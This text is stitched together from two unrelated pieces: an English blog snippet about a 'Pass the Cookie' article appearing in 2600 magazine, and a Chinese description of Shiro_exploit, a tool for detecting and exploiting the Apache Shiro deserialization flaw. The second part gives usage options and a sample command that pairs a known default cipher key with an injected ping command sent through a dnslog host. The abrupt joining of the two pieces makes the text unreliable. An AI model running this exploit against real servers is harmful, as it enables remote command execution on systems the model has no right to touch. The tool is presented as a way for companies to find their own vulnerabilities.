Pass the Cookie made it into the latest 2600 magazine! Very excited about this!
I was just walking around Capitol Hill and stopped by Ada’s Technical Books on 15th Avenue - a great coffee shop with lots of technical books. Right after walking in to grab a cup of tea, I saw the latest Hacker Quarterly. A few months back I submitted an article about “Pass the Cookie”, so I had to check, and the article got indeed published!
Shiro_exploit用于检测与利用Apache Shiro反序列化漏洞脚本。可以帮助企业发现自身安全漏洞。
工具下载地址:Shiro_Exploit
该脚本通过网络收集到的22个key,利用ysoserial工具中的URLDNS这个Gadget,并结合dnslog平台实现漏洞检测。漏洞利用则可以选择Gadget和参数,增强灵活性。
环境Python2.7
requests
Jdk 1.8
使用说明 usage: shiro_exploit.py [-h] -u URL [-t TYPE] [-g GADGET] [-p PARAMS] [-k KEY] OPTIONS: -h, --help show this help message and exit -u URL, --url URL Target url. -t TYPE, --type TYPE Check or Exploit. Check :1 , Exploit:2 , Find gadget:3 -g GADGET, --gadget GADGET gadget -p PARAMS, --params PARAMS gadget params -k KEY, --key KEY CipherKey Example: python shiro_exploit.py -u target检测默认只需要使用-u参数即可。
检测可用gadget的方式可以运行
python shiro_exploit.py -u http://target/ -t 3 -p "ping -c 2 {dnshost}" -k "kPH+bIxk5D2deZiIxcaaaA=="
程序执行时会获取dnslog的域名替换 {dnshost} 这个值。不需要进行修改。目前还没解决windows和linux系统通用性的问题。这里-p自己根据实际情况指定下吧。